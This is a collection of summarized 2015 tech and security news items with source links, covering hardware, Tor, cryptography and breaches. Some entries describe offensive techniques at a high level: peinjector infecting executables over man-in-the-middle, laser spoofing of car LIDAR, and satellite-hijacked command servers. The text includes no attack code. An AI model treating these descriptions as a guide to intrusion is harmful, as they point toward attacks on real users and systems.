## Orange is the New ($15) Pi

- The Orange Pi is a direct competitor and has a few variants

- Originally, the board cost about $30 but sports WiFi, a 1.6 GHz processor, 8 GB of flash, and a SATA interface

- Theres now a reduced version of the board for about $15 that deletes the flash and SATA along with the WiFi and one of the originals 4 USB ports

- Still, the Raspberry Pi doesnt have built-in flash. And the $15 Orange Pi PC has the things youd expect on a Pi (HDMI and Ethernet) along with other extras like an IR receiver and an on-board microphone

- Not bad for $15 considering it has a quad-core processor, a GPU and 1GB of RAM.

[http://hackaday.com/2015/09/05/orange-is-the-new-15-pi/](http://hackaday.com/2015/09/05/orange-is-the-new-15-pi/)

.footnote[2015-09-18 13:24:35 - Unknown]

---

## Tiny Headless Servers Everywhere

- a new Ubuntu distribution flavor, Ubuntu (Snappy) Core, targets both the multi-bazillion-dollar Amazon Elastic Compute Cloud and the $55 BeagleBone Black.

- the BeagleBone Black (2013) again picked up an HDMI port, because, heck, why not? And as if to answer that question, the newest BeagleBone Green replaces the video out with some I2C peripheral connectors, reaffirming the devices intent as an embedded computer rather than a mini-desktop.

- So if the Internet of Things is going to be an internet of headless Linux boxes, isnt it time our software / operating systems caught up? No more of this GUI configuration menu crap  thats for desktops that have the luxury of monitors. What you need, once youve got your Raspberry Pi or BeagleBone sitting deep inside some box somewhere, is quick and easy deployment and network-based remote administration of the tiny headless Linux server that lies within. And until youve got its web server or VNC up and running, that means spending some quality time with the console.

- The unlikely marriage of software tech from cloud appliances with our hacked (non-metaphorical) appliances is just starting, and we think its actually going to benefit us hardware types. Granted, its partly semantic, but we think that recognizing your Twittering Toilet as a headless Linux server could bring increases in reproducibility and security, as well as convenience.

[http://hackaday.com/2015/09/17/tiny-headless-servers-everywhere/](http://hackaday.com/2015/09/17/tiny-headless-servers-everywhere/)

.footnote[2015-09-18 13:22:34 - Unknown]

---

## Larry Lessig Reaches Funding Goal and Is Running For President

- I'm not American but US politics has a way of affecting everyone, so I think it's cool what he's trying to do. That said, I think he needs to practice his TV interviewing style a bit.

- He spoke VERY fast, sounded kind of shrill, and the tumble of words didn't communicate as much as I expected given their quantity.

- There were a lot of things that sounded like generic political soundbites any candidate might say.

- Reform of Washington should be a bi-partisan issue: I had expected him to run as an independent and then resign and trigger fresh elections once his platform was passed.

- But I guess that sort of thing isn't possible. The other is that surely he it takes more than one man to deliver the reforms he wants.

[http://politics.slashdot.org/story/15/09/06/1911215/larry-lessig-reaches-funding-goal-and-is-running-for-president](http://politics.slashdot.org/story/15/09/06/1911215/larry-lessig-reaches-funding-goal-and-is-running-for-president)

.footnote[2015-09-13 05:42:45 - Unknown]

---

## Debian Working on Reproducible Builds To Make Binaries Trustable

- An anonymous reader writes: Debian's Jeremy Bobbio, also known as Lunar, spoke at the Chaos Communication Camp about the distribution's efforts to reassert trustworthiness for open source binaries after it was brought into question by various intelligence agencies.

- Debian is "working to bring reproducible builds to all of its more than 22,000 software packages," and is pushing the rest of the community to do the same.

- Lunar said, "The idea is to get reasonable confidence that a given binary was indeed produced by the source.

- We want anyone to be able to produce identical binaries from a given source (PDF).

- "  Here is Lunar's overview of how this works: "First you need to get the build to output the same bytes for a given version.

[http://linux.slashdot.org/story/15/09/07/1311247/debian-working-on-reproducible-builds-to-make-binaries-trustable](http://linux.slashdot.org/story/15/09/07/1311247/debian-working-on-reproducible-builds-to-make-binaries-trustable)

.footnote[2015-09-13 05:42:24 - Unknown]

---

## Windows Telemetry Rolls Out

- ihtoit writes:  Last week came the warning, now comes the roll out.

- One of the most most controversial aspects of Windows 10 is coming to Windows 7 and 8.

- Microsoft has released upgrades which enable the company to track what a user is doing.

- The updates  KB3075249, KB3080149 and KB3068708  all add "customer experience and diagnostic telemetry" to the older versions.

- gHacks points out that the updates will ignore any previous user preferences reporting: "These four updates ignore existing user preferences stored in Windows 7 and Windows 8 (including any edits made to the Hosts file) and immediately starts exchanging user data with vortex-win.data.microsoft.com and settings-win.data.microsoft.com.

[http://yro.slashdot.org/story/15/09/07/1845214/windows-telemetry-rolls-out](http://yro.slashdot.org/story/15/09/07/1845214/windows-telemetry-rolls-out)

.footnote[2015-09-13 05:42:18 - Unknown]

---

## Steve Wozniak "Steve Jobs Played No Role In My Designs For the Apple I & II"

- Because on the one hand you got those people who worship CEOs and think they deserve their fat bonuses and salaries.

- On the other hand there is another equally cynical group of people who claim Steve Jobs made no contributions and was just leeching of the work of others.

- You can even read Woz's own accounts that Steve was influential even for the early Apple computers.

- He provided lots of feedback all through development steering it in the direction of his vision.

- They would get their smart ideas shot down by narrow minded leadership.

[http://apple.slashdot.org/story/15/09/07/1827205/steve-wozniak-steve-jobs-played-no-role-in-my-designs-for-the-apple-i-ii](http://apple.slashdot.org/story/15/09/07/1827205/steve-wozniak-steve-jobs-played-no-role-in-my-designs-for-the-apple-i-ii)

.footnote[2015-09-13 05:42:12 - Unknown]

---

## Vulnerabilities In WhatsApp Web Affect Millions of Users Globally

- Vulnerabilities In WhatsApp Web Affect Millions of Users Globally - Slashdot

-  Vulnerabilities In WhatsApp Web Affect Millions of Users Globally

- An anonymous reader writes with an alert for anyone who uses the WhatsApp Web application.

- Check Point researcher Kasif Dekel, according to NetSecurity.Org, has discovered that to exploit the vulnerability, an attacker simply needs to send a WhatsApp user a seemingly innocent vCard contact card, containing malicious code. When this card is opened from within the app, the executable it contains is run, further compromising computers by distributing malware including ransomware, bots, remote access tools, and other types of malicious code.

- Not all users need to panic about this vulnerability, though: the company has rolled out a fix, contained in all versions of WhatsApp Web after v0.1.4481.

[http://it.slashdot.org/story/15/09/08/1256231/vulnerabilities-in-whatsapp-web-affect-millions-of-users-globally](http://it.slashdot.org/story/15/09/08/1256231/vulnerabilities-in-whatsapp-web-affect-millions-of-users-globally)

.footnote[2015-09-13 05:41:13 - Unknown]

---

## Neocities Becomes the First Major Site To Implement the Distributed Web

- An anonymous reader writes: HTTP has served us well for a long time, but will we continue to use HTTP forever?

- Since Brewster Kahle called for a distributed web, more people have been experimenting with what is being called the Permanent Web: Web sites that can be federated instantly, and served from trustless peers.

- Popular web hosting site Neocities has announced that they are the first major site to implement IPFS, which is the leading distributed web protocol, and they published the announcement using IPFS itself.

[http://tech.slashdot.org/story/15/09/08/227213/neocities-becomes-the-first-major-site-to-implement-the-distributed-web](http://tech.slashdot.org/story/15/09/08/227213/neocities-becomes-the-first-major-site-to-implement-the-distributed-web)

.footnote[2015-09-13 05:40:24 - Unknown]

---

## Apple Product Event Highlights

-    Apple Watch: Adding Facebook Messenger.iTranslate  speak into the mic and hear translations in over 90 languages.Physician app AirStrip can monitor vitals.New band options, two new finishes gold and rose gold.Watch OS 2 comes out September 16.   iPad:iPad Pro announced: Screen is 12.9 inches, 5.6m pixels, A9X chip, with 2x memory bandwidth, storage and graphics performance, 10-hour battery life, 8MP camera, 802.11ac with MIMO, 150Mbps LTE modem, TouchID, 6.9mm thick and 1.57 pounds.Smart Keyboard connects magnetically.The Apple Pencil stylus: "Highly responsive sensors built into the tip of Apple Pencil sensor pressure, tilt, and stroke.

- "Corporate VP from MS Office, Kirk Koenigsbauer talks Microsoft Office for iPad.New suite of Adobe apps.Apple Pencil is $99 and Smart Keyboard is $169, all available in November.New iPad mini 4 $399.   Apple TV:New remote with glass touch surface.

- 32GB for $149, 64GB for $199.iTunes, Netflix, Hulu, HBO, and Showtime are searchable.New cleaner looking UI with Siri integration.New OS: TV OS.new games and game collections for the family, using your iPhone or iPod Touch as a controller.MLB app, NHL Game Center live in 2016.tvOS developer beta available today, available to consumers in late October.   iPhone:iPhone 6S and 6S Plus, Silver, gold, space grey, and new Rose Gold.

- 50% more pixels and 50% more focus pixels for faster autofocus.4K video5MP FaceTime HD Camera.Retina Flash, display can light up 3X brighter than usual to be a flash for the front-facing camera.Live Photos: Press with 3D Touch and pictures will move.iPhone 6 $199-$399, iPhone 6 Plus $299-$499 all on two-year contracts.New iPhone Upgrade Program for a new iPhone every year, choose your carrier, unlocked phones, 24-month installment plan starting at $32/month.preorder Saturday, Sept 12.

- Available September 25th.iOS 9 available September 16th.New iCloud storage pricing: 50GB for 99 cents a month, 200GB for $2.99/mo, 1TB for $9.99/mo.

[http://apple.slashdot.org/story/15/09/09/1911236/apple-product-event-highlights](http://apple.slashdot.org/story/15/09/09/1911236/apple-product-event-highlights)

.footnote[2015-09-13 05:39:30 - Unknown]

---

## Cryptographers Brace For Quantum Revolution

- Tokolosh writes: An article in Scientific American discusses the actions needed to address the looming advent of quantum computing and its ability to crack current encryption schemes.

- Interesting tidbits from the article: "'I'm genuinely worried we're not going to be ready in time,' says Michele Mosca, co-founder of the Institute for Quantum Computing (IQC) at the University of Waterloo..." and "Intelligence agencies have also taken notice.

- On August 11, the US National Security Agency (NSA) revealed its intention to transition to quantum-resistant protocols when it released security recommendations to its vendors and clients."

- Another concern is "intercept now, decrypt later", which presumably refers to the giant facility in Utah.In related news, an anonymous reader points out that the NSA has updated a page on its website, announcing plans to shift the encryption of government and military data from current cryptographic schemes to new ones that can resist an attack by quantum computers.

[http://it.slashdot.org/story/15/09/09/1938206/cryptographers-brace-for-quantum-revolution](http://it.slashdot.org/story/15/09/09/1938206/cryptographers-brace-for-quantum-revolution)

.footnote[2015-09-13 05:39:11 - Unknown]

---

## BackBox Linux  Penetration Testing LiveCD

- Check For Vulnerabilities with Acunetix BackBox is a Linux distribution based on Ubuntu  a penetration testing LiveCD.

- It has been developed to perform penetration tests and security assessments.

- Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools. BackBox Linux - Penetration Testing LiveCD The most recent release is BackBox Linux 4.3, the latest stable build of the projects Ubuntu-based distribution containing a collection of utilities designed to perform penetration testing and forensic analysis tasks. The main aim of BackBox is providing an alternative, highly customizable and well performing system.

- BackBox uses the light window manager Xfce. It includes some of the most used security and analysis Linux tools, aiming for a wide spread of goals, ranging from web application analysis to network analysis, from stress tests to sniffing, also including vulnerability assessment, computer forensic analysis and exploitation. Part of the power of this distribution comes from its Launchpad repository core, constantly updated to the latest stable version of the most known and used ethical hacking tools. Whats New  Preinstalled Linux Kernel 3.16 New Ubuntu 14.04.2 base Ruby 2.1 Installer with LVM and Full Disk Encryption options Handy Thunar custom actions RAM wipe at shutdown/reboot System improvements Upstream components Bug corrections Performance boost Improved Anonymous mode Predisposition to ARM architecture (armhf Debian packages) Predisposition to BackBox Cloud platform New and updated hacking tools: beef-project, btscanner, dirs3arch, metasploit-framework, ophcrack, setoolkit, tor, weevely, wpscan, etc.  System Requirements  32-bit or 64-bit processor 512 MB of system memory (RAM) 6 GB of disk space for installation Graphics card capable of 800600 resolution DVD-ROM drive or USB port (2 GB)  Upgrade Instructions To upgrade from a previous version (BackBox 4.x) follow these instructions: You can download Backbox 4.3 here: x86  backbox-4.3-i386.iso (torrent) x86_64  backbox-4.3-amd64.iso (torrent) Or read more here.

[http://www.darknet.org.uk/2015/09/backbox-linux-penetration-testing-livecd/](http://www.darknet.org.uk/2015/09/backbox-linux-penetration-testing-livecd/)

.footnote[2015-09-16 23:05:28 - Unknown]

---

## JonDoNym/peinjector

- The peinjector provides different ways to infect these files with custom payloads without changing the original functionality.

- It is very performant, lightweight, modular and can be operated on embedded hardware.

- A sample Python MITM implementation is included.   Foolproof, mobile-ready web interface.

- mitmproxy - An interactive console program that allows traffic flows to be intercepted, inspected, modified and replayed.

- It can also do MITM executable modification, but doesnt provide seamless patching and isnt as performant as peinjector.

[https://github.com/JonDoNym/peinjector](https://github.com/JonDoNym/peinjector)

.footnote[2015-09-15 19:28:10 - Unknown]

---

## See Actual Microwaves  No More Faking It

- It used a tablet as an interface device to show you what the wireless signals around you looked like and was kind of impressive if you squinted your eyes and didnt think too much about it.

- In this post I will show you how to actually do it by modifying a coffee can radar which you can build at home. The late great Prof.

- If you stand in front of the radar in this mode and walk towards it and away from it you will see a slowly time varying waveform directly proportional to where you are standing. To visualize wireless radiation, Ive modified the op-amp circuit on the output of this mixer so that it can feed a pair of LEDs, one red and one green.

- For more fine detail spend more time moving the receiver assembly around while the DSLR shutter is open. For each wireless router in your home or office this is what the radiated fields look like. IEEE Microwave Theory and Techniques Association (MTT) Video Competition This work helped to spur an innovative competition sponsored by IEEE MTT where some of these methods were used for a variety of scenarios and the results are amazing (scroll to about 2 min into video below):  Your turn Its well within your ability to measure and observe the nature of wireless propagation.

- If youre still not convinced that this is for you, take a look at [David Schneiders] Coffee Can Radar presentation, and my own video demonstrations of Doppler shift using the hardware. Author Bio Gregory L. Charvat likes to image wireless radiation, is the author of Small and Short-Range Radar Systems, a visiting research Scientist at MIT Media Lab, co-founder of Hyperfine Research Inc. and Butterfly Network Inc. Greg is editor of the G. L. Charvat Series on Practical Approaches to Electrical Engineering.

[http://hackaday.com/2015/09/08/see-actual-microwaves-no-more-faking-it/](http://hackaday.com/2015/09/08/see-actual-microwaves-no-more-faking-it/)

.footnote[2015-09-12 12:18:50 - Unknown]

---

## Finally, an Official Display for the Raspberry Pi

- Yes, finally, and after years of work and countless people complaining on forums, there is a proper, official display for the Raspberry Pi. Its a 7-inch display, 800 x 480 pixel resolution, 24-bit color, and has 10-point multitouch.

- This DPI interface is an electrical nightmare that spews RF interference everywhere it goes.  The new display could have used the DSI (Display Serial Interface) adapter, or the small connector on the Pi that is not the camera connector.

- The best solution, and the design the Raspberry Pi foundation chose to go with, is a DPI display and an adapter that converts the Pis DSI output to something the display can understand. The solution the Pi foundation eventually settled on is an adapter board that converts the DSI bus to DPI signalling.

- This of course requires an extra PCB, and the Foundation provided mounting holes so a Pi can connect directly to it. While this is the first display to make use of the DSI interface, it will assuredly not be the last.

- While the 800480 resolution of the official display may be a bit small, there will undoubtedly be a few hardcore tinkerers out there that will take this adapter board and repurpose it for larger displays. [Alex Eames] got his hands on the Pi Display a few weeks ago, you can check out his introductory video below. 

[http://hackaday.com/2015/09/08/finally-an-official-display-for-the-raspberry-pi/](http://hackaday.com/2015/09/08/finally-an-official-display-for-the-raspberry-pi/)

.footnote[2015-09-12 12:18:44 - Unknown]

---

## Steal This Ham Radio (Technology)

- There are other special cases too, like bouncing signals off meteors where the right digital strategy can significantly improve odds of getting messages through. One of the first of these soundcard methods was PSK31.

- To help make up for the slow baud rate, the system employs a variable length code so common letters use shorter bit patterns.

- JTMS is useful for meteor scatter and JT65 for moonbounce (yes, thats what it sounds like) and can enable slow data transfer with signals inaudible to the human ear.

- We covered that earlier and the linked YouTube video (and the picture, right) shows a voice contact (a QSO) that is difficult to understand using regular analog transmissions, but is perfectly clear using the digital techniques.

- Then again, not all solutions require DSP, but widespread adoption has been due to the ease of development and use with a common PC. My point isnt related to any particular mode, though (if you really want to see a demo of PSK31, check out the video below).

[http://hackaday.com/2015/09/09/steal-this-ham-radio-technology/](http://hackaday.com/2015/09/09/steal-this-ham-radio-technology/)

.footnote[2015-09-12 12:18:26 - Unknown]

---

## Open Source Router Firmware OpenWRT 15.05 Released

- There has been a lot of misinformation being spread by certain technical news publications about proposed rule changes.

- The rules which have already passed are also a problem and there will be further efforts to get them overturned. We are already seeing manufacturers add signature checking (locks) to the stock firmware they ship on *older routers* as a result of the re-certification process.

- The FCC has been quoted saying that they don't care how its achieved, but the reality is the quick and easy way and really only way for most/all manufactures to comply with these rule changes *in practice* is to lock the devices down.

- Don't trust my words- go look at the PUBLIC mailing list archive yourself. Lawyers, activists, and technologists from a variety of groups who have worked on FCC rule changes in the past are also involved in the campaign.

- The Save Wifi coalition is preparing letters and setting up a campaign similar to Dear FCC, SOPA, and similar campaigns to fight this. The current proposed rules are what are currently at issue for the campaign, but there will be efforts to overturn rules already passed, and stop similar rules from going through in both Europe and Canada.

[http://news.slashdot.org/story/15/09/11/2219210/open-source-router-firmware-openwrt-1505-released](http://news.slashdot.org/story/15/09/11/2219210/open-source-router-firmware-openwrt-1505-released)

.footnote[2015-09-12 11:48:59 - Unknown]

---

## Serious bug causes quite a few HTTPS sites to reveal their private keys

- Because the scan surveyed only a verysmallpercentage of the overall number of transport layer security protocolhandshakes, many more keys and manufacturers are likely to be affected by the leakage.

- Still, Weimers nine-month experiment demonstrates that patient adversaries who are interested in impersonating a wide range of sites will eventually succeed, and success will only grow with time and with the number of simultaneous scans that are carried out.

- The obvious beneficiary of this technique would be the National Security Agency and other state-sponsored spy groups that are in a position to monitor huge amounts of Internet traffic. Perfect in name only Some of the devices Weimer observed leaking data were extremely old and were possibly in the process of failing.

- Weimer has a much fuller discussion of available fixes on page eight of his paper. This weeks findings come as more and more websites, chat applications, and other Internet services are implementing perfect forward secrecy.

- Despite its name, though, perfect forward secrecy comes with its own weaknesses, which users must actively monitor. Weimer said effective short-term fixes include the kinds of signature checks found in the NSS or OpenSSL code libraries.

[http://arstechnica.com/security/2015/09/serious-bug-causes-quite-a-few-https-sites-to-reveal-their-private-keys/](http://arstechnica.com/security/2015/09/serious-bug-causes-quite-a-few-https-sites-to-reveal-their-private-keys/)

.footnote[2015-09-12 11:47:44 - Unknown]

---

## Mozilla: data stolen from hacked bug database was used to attack Firefox

- Bug trackingRandy WatsonAn attacker stole security-sensitive vulnerability information from the Mozillas Bugzilla bug tracking system and probably used it to attack Firefox users, the maker of the open-source Firefox browser warned Friday. In an FAQ published(PDF) alongside Mozillas blog post about the attack, the company added that the loss of information appeared to stem from a privileged users compromised account.

- The user appeared to have re-used their Bugzilla account password on another website, which suffered a data breach.

- The attacker then allegedly gained access to the sensitive Bugzilla account and was able to download security-sensitive information about flaws in Firefox and other Mozilla products. Mozilla addedthat the attacker accessed185 non-public Firefox bugs, of which 53 involved severe vulnerabilities. Ten of the vulnerabilities were unpatched at the time, while the remainder had been fixed in the most recent version of Firefox at the time. Of the ten unpatched bugs, the company believes that the attacker usedone to exploit a Firefox vulnerability.

- Mozilla wrote about that vulnerability at the beginning of August, warning users thatan advertisement on a news site in Russia was serving a Firefox exploit that searched for sensitive files and uploaded them to a server that appears to be in Ukraine. The vulnerability was patched on August 6. Mozilla said today that it did not have proof that the attacker who accessed the privileged Bugzilla users account had exploited any other vulnerabilities. The company added that it had fixed all of the vulnerabilities that the attacker learned about and could have used to harm Firefox users, with a release of a new version of Firefox on August 27. The software company noted that it had confirmed instances of unauthorized access to Bugzilla as early as September 2014, but it added that the attackers ability to access the system could date back as far as September 2013.

- Mozilla didnt divulge when it discovered that there had been unauthorized access to Firefoxs bug tracker, but it says that when it discovered the attack, it shut down the compromised account and contacted a third-party security firm to complete a forensic analysis. We are updating Bugzillas security practices to reduce the risk of future attacks of this type, Mozilla wrote on its blog.

[http://arstechnica.com/security/2015/09/mozilla-data-stolen-from-hacked-bug-database-was-used-to-attack-firefox/](http://arstechnica.com/security/2015/09/mozilla-data-stolen-from-hacked-bug-database-was-used-to-attack-firefox/)

.footnote[2015-09-12 11:47:13 - Unknown]

---

## TSA Master Keys

- Its now blurred out of the Washington Post story, but the image is still floating around the Internet.

- TSA Travel Sentry luggage locks contain a disclosed backdoor which is similar in spirit to what Director Comey desires for encrypted phones.

- In theory, only the Transportation Security Agency or other screeners should be able to open a TSA lock using one of their master keys.

- All others, notably baggage handlers and hotel staff, should be unable to surreptitiously open these locks.

- EDITED TO ADD (9/10): Someone has published a set of CAD files so you can make your own master keys.

[https://www.schneier.com/blog/archives/2015/09/tsa_master_keys.html](https://www.schneier.com/blog/archives/2015/09/tsa_master_keys.html)

.footnote[2015-09-12 11:46:19 - Unknown]

---

## Researchers respond to developers accusation that they used crypto wrong

- And one of the researchers responded at length to the rebuttal in a blog post on Monday, further pressing his case. As Ars reported last week, CryptDB is central to many efforts to easily add strong security to existing Structured Query Language-based applicationsand to move some of those applications safely into private and public cloud database services. The awesome thing about CryptDB is that you can store your data in encrypted form without rewriting your apps, said Charles Wright of Portland State University, one of the authors of the paper, in an e-mail to Ars.

- The alternative is to spend a lot of time and effort rewriting the application. Enlarge / A table from the original CryptDB paper, showing the number of columns requiring OPE and DET encryption for sample applications to function properly.Raluca Ada Popa, Catherine M. S. Redeld, Nickolai Zeldovich, and Hari Balakrishnan. In his blog post, Kamara reiterated that the team had followed the pattern that any electronic medical record system would have followedor else be rendered essentially useless, since using the higher level of encryption provided for by CryptDB would have made queries against the system impossible.

- We even confirmed that the OpenEMR system (which is used as motivation in [the original CryptDB paper]) queries sex, race, age, admission month patient died and primary payer.

- Is this really consistent with how these systems are motivated and understood? In his e-mail to Ars, Wright added, Using DET and OPE, but only when its necessary for the app, is the killer feature of CryptDB.

- Just how vulnerable data protected by PPE is, and how widely it can be used safely, will have a major bearing on whether CryptDB and Mylar can succeed going forward.

[http://arstechnica.com/information-technology/2015/09/researchers-respond-to-developers-accusation-that-they-used-crypto-wrong/](http://arstechnica.com/information-technology/2015/09/researchers-respond-to-developers-accusation-that-they-used-crypto-wrong/)

.footnote[2015-09-12 11:46:17 - Unknown]

---

## How highly advanced hackers (ab)used satellites to stay under the radar

- Now researchers have discovered a highly unusual method that members of the so-called Turla group used to cover their tracks.

- But theres something about the connections that made them highly attractive to Turla members: most satellite links are unencrypted and can be intercepted by anyone within a radius of more than 600 miles.

- This creates the possibility for abuse. Companies that provide downstream-only Internet access use teleport points to beam the traffic up to the satellite.

- The satellite broadcasts the traffic to larger areas on the ground, in the Ku band (12-18Ghz), by routing certain IP classes through the teleport points. The Turla attackers listen for packets coming from a specific IP address in one of these classes.

- As a result, researchers were largely stopped from shutting down the operation or gaining clues about who was carrying it out. Its probably one of the most effective methods of ensuring their operational security, or that nobody will ever find out the physical location of their command and control server, Tanase told Ars.

[http://arstechnica.com/security/2015/09/how-highly-advanced-hackers-abused-satellites-to-stay-under-the-radar/](http://arstechnica.com/security/2015/09/how-highly-advanced-hackers-abused-satellites-to-stay-under-the-radar/)

.footnote[2015-09-12 11:45:40 - Unknown]

---

## The remote control from HELL: Driverless cars slam on brakes for LASER POINTER

- An attack that works against todays assisted driving vehicles and could make life hard for the driverless cars of tomorrow, according to researcher Jonathan Petit. Petit, of Security Innovation, says $60 worth of laser with a bit of smarts makes cars sense phantom obstacles and hit the brakes, by interfering with the LIDAR (light-radar) sensors they use to detect and avoid objects around them.

- Petit says his laser pointer system (which can include a pulse modulator for added fun) could target cars from up to 100 metres away, emulating a wall or pedestrian to force vehicles to slam on brakes or swerve. I can take echoes of a fake car and put them at any location I want, Petit told IEEE Spectrum. And I can do the same with a pedestrian or a wall. I can spoof thousands of objects and basically carry out a denial of service attack on the tracking system so its not able to track real objects. LIDAR first found widespread application in high-accuracy airborne mapping, but is sneaking into the top end of the motor industry.

- Last week, Pioneer announced it wants to repurpose its old Laserdisc technology into cheap LIDAR kit. Petit says the laser pointer attack does not need to be accurate and could also be used to simply overwhelm with signals causing a vehicle to stop dead and not move. The hacker will showcase his work at Black Hat Europe in November where he will offer some building with the breaking and detail defensive systems against laser pointers. Results from laboratory experiments show effective blinding, jamming, replay, relay, and spoofing attacks.

- We propose software and hardware countermeasures that improve sensors resilience against these attacks.

-  Sponsored:  OpenStack for enterprise: The tipping point cometh 

[http://www.theregister.co.uk/2015/09/10/hack_slelf_driving_car_laser/](http://www.theregister.co.uk/2015/09/10/hack_slelf_driving_car_laser/)

.footnote[2015-09-12 11:45:32 - Unknown]

---

## Drone Self-Defense and the Law

- I had my 40mm Glock on me and they started toward me and I told them, If you cross my sidewalk, theres gonna be another shooting. Police charged Meredith with criminal mischief and wanton endangerment.

- Rebalancing security and privacy after technology changes capabilities can be very difficult, and take years.

- In January, a man lost control of his drone, which crashed on the White House lawn.

- This will create serious problems for society, because our legal system is largely based on deterring human miscreants rather than their proxies.

- But more importantly, we need to rethink our assumptions of security and privacy in a world of autonomous drones, long-range cameras, face recognition, and the myriad other technologies that are increasingly in the hands of everyone.

[https://www.schneier.com/blog/archives/2015/09/drone_self-defe.html](https://www.schneier.com/blog/archives/2015/09/drone_self-defe.html)

.footnote[2015-09-12 11:39:36 - Unknown]

---

## MIT ranks high in bad security at major universities

- This is not the sort of MIT hack covered in SecurityScorecards report, but it is a useful illustration of the schools security posture.MITOne of the most prestigious schools in information technology also ranks first among its peers in information security in a new studyfirst among the worst, that is.In arecent security survey of 485 colleges and universities around the world with 1,000 or more public Internet Protocol addresses, the Massachusetts Institute of Technology ranked at the bottom, earning just above an overall failing grade.

- The assessment, performed by the information security assessment company SecurityScorecard, gave MITa nearly failing grade,putting the school in the basement below New Mexico State University and Cambridge University. One of the most prestigious and recognized schools of higher learning in the world, Massachusetts Instituteof Technology, is not displaying strength in its security posture, the SecurityScorecard researchers reported.

- With nearly 80,000 IP addresses discoveredin the SecurityScorecard platform, the Cambridge college is showing a plethora of security risks,vulnerabilities, and weaknesses.

- MIT had an average malware infection duration on IP addresses scanned of1.678 days, which is higher than 80% of the education vertical, the researchers noted. Network security: a score based on the number of vulnerable services running directly exposed to the Internet, based on a scan that audits version numbers of exposed software and open ports on those systems correlated with a database of known exploits, according to SecurityScorecard Chief of Research Alex Heid. Hacker chatter: a score based on the frequency with which the school was mentioned in hacker forums, and amount of user credentials, e-mail addresses and other breached data circulating on those forums over the observed period. Password exposurethe degree to whichstudents, faculty, and employeesare using weak passwords).

- Andsaving MIT from an overall failing grade, however, were the schools A grades in Web application security, the health of its DNS records, and the quality of its endpoint security. Ars reached out to MIT for comment on the survey, but the school was unable to supply a response in time for publication.

[http://arstechnica.com/security/2015/09/mit-is-tops-in-bad-security-at-major-universities/](http://arstechnica.com/security/2015/09/mit-is-tops-in-bad-security-at-major-universities/)

.footnote[2015-09-12 11:39:24 - Unknown]

---

## Inspire 14: Assassination Operations and Dabiq 11: The War of Coalitions

- Yesterday there was a report put out about fifty intelligence analysts who officially complained about their analysis products being cherry picked or edited to suit the administrations needs and this in tandem with the drops of both magazines at nearly the same time had my interest piqued.

- I guess in the vast sea of what is claimed to be journalism, the truth of matters is often lost but if you pay attention sometimes you can get some clarity. The biggest part of the revelations by the intelligence community analysts is that they say we are losing ground with Daesh in reality, not as the administration would like us all to think.

- While the Inspire is the usual ideologue format it has some scary content in that it is giving directed ideas to the would be jihobbyists with their OSJ (Open Source Jihad) sections ranging from how to make a hand grenade to a call for the Lone Wolf Caravan to carry out assassination operations.

- In this case they picked up on a piece by Mike Scheuer which I will talk about below. ASSESSMENT: In an ideological war such as we are seeing played out by vying Islamist parties like Daesh and AQAP the clear winner in trying to evince a more stable and likely successful attack by a jihobbyist would be what you see in Inspire.

- Sure the underpinnings are all about being a good Muslim and ridding the ummah of the Wests boot on their collective throat (perceived) but they are second to the slick pictures and notions of being a James Bond figure. Finally, when Daesh reaches the same point with their magazine I will worry more that a flotilla of fanboys will latch onto their crazy with much more information and perhaps pull off an assassination.

[https://krypt3ia.wordpress.com/2015/09/10/inspire-14-assassination-operations-and-dabiq-11-the-war-of-coalitions/](https://krypt3ia.wordpress.com/2015/09/10/inspire-14-assassination-operations-and-dabiq-11-the-war-of-coalitions/)

.footnote[2015-09-12 11:39:01 - Unknown]

---

## Tor Weekly News  September 4th, 2015

- All of the infrastructure for OnioNS is in place, and while a few protocols are still to be finished, the client-side and HS-side software is pretty reliable and stable at this point, with support for Debian, Ubuntu, Mint, and Fedora.

- Ill continue developing OnionBalance so that if possible, it can facilitate some form of load balancing and redundancy with next-gen hidden services. Congratulations to Jesse and Donncha on getting their innovative projects to this stage, and thanks to the mentors and coordinators who have made the Summer of Privacy a success.

- Rejecting such relays from the consensus might force attackers to jump through more hoops, but would mean obtaining the netblocks that are periodically published by all three (and perhaps more) cloud providers. Tim Wilson-Brown (teor) wondered about the effect this might have on Tor developers and researchers who would like to use cloud-based relays, while nusenu requested that any rejection be publicly documented so volunteers dont waste their time and money setting up blacklisted relays. Miscellaneous news Karsten Loesing announced version 2.6 of Onionoo, the Tor network data observatory.

- These new fields support different family-mapping use-cases that may be required by Tor network tools such as Atlas, Globe, and Roster.

- If I should also wait for other clients to be updated, please let me know. After several television appearances over the past few years, Tor made its literary debut last month in the fourth installment of the late Stieg Larssons Millennium series.

[https://blog.torproject.org/blog/tor-weekly-news-%E2%80%94-september-4th-2015](https://blog.torproject.org/blog/tor-weekly-news-%E2%80%94-september-4th-2015)

.footnote[2015-09-12 11:38:55 - Unknown]

---

## Tor Weekly News  September 10th, 2015

- Tor talks and trainings are often a feature of free public privacy events like cryptoparties, as well as Internet security workshops put on by groups and organizations especially in need of online privacy in their activities. Until now, Tor teachers have had no central meeting-place to share advice, compare experiences, or make future plans, so Alison Macrina and Nima Fatemi this week announced the creation of the tor-teachers mailing list.

- Topics of discussion will range from visionary stuff like the philosophical underpinnings of the right to free expression and inquiry, to more prosaic Tor-related questions such as how to use the darn thing and how best to convey this to users from all backgrounds. If this sounds like the sort of thing you either would like to be doing or are already an old hand at, you are most welcome to join!

- Good luck! Miscellaneous news Luke Millanta announced the launch of OnionView, a web service which utilizes Tor relay data, gathered using the Onionoo network status protocol, to plot the location of active Tor nodes onto an interactive map of the world.

- Created in collaboration with Tors Measurement team, OnionViews relay database is updated every thirty minutes to help ensure map accuracy.

- Join the developers in the #tor-dev IRC channel to become involved in future work on OnionView.  This issue of Tor Weekly News has been assembled by Harmony and Luke Millanta. Want to continue reading TWN?

[https://blog.torproject.org/blog/tor-weekly-news-%E2%80%94-september-10th-2015](https://blog.torproject.org/blog/tor-weekly-news-%E2%80%94-september-10th-2015)

.footnote[2015-09-12 11:38:52 - Unknown]

---

## CynoSure Prime: How we cracked millions of Ashley Madison bcrypt hashes efficiently

- Having cracked the token, we simply then had to case correct it against its bcrypt counterpart. The $loginkey variable seemed to be used for automatic login, but we didnt spend much time investigating further.

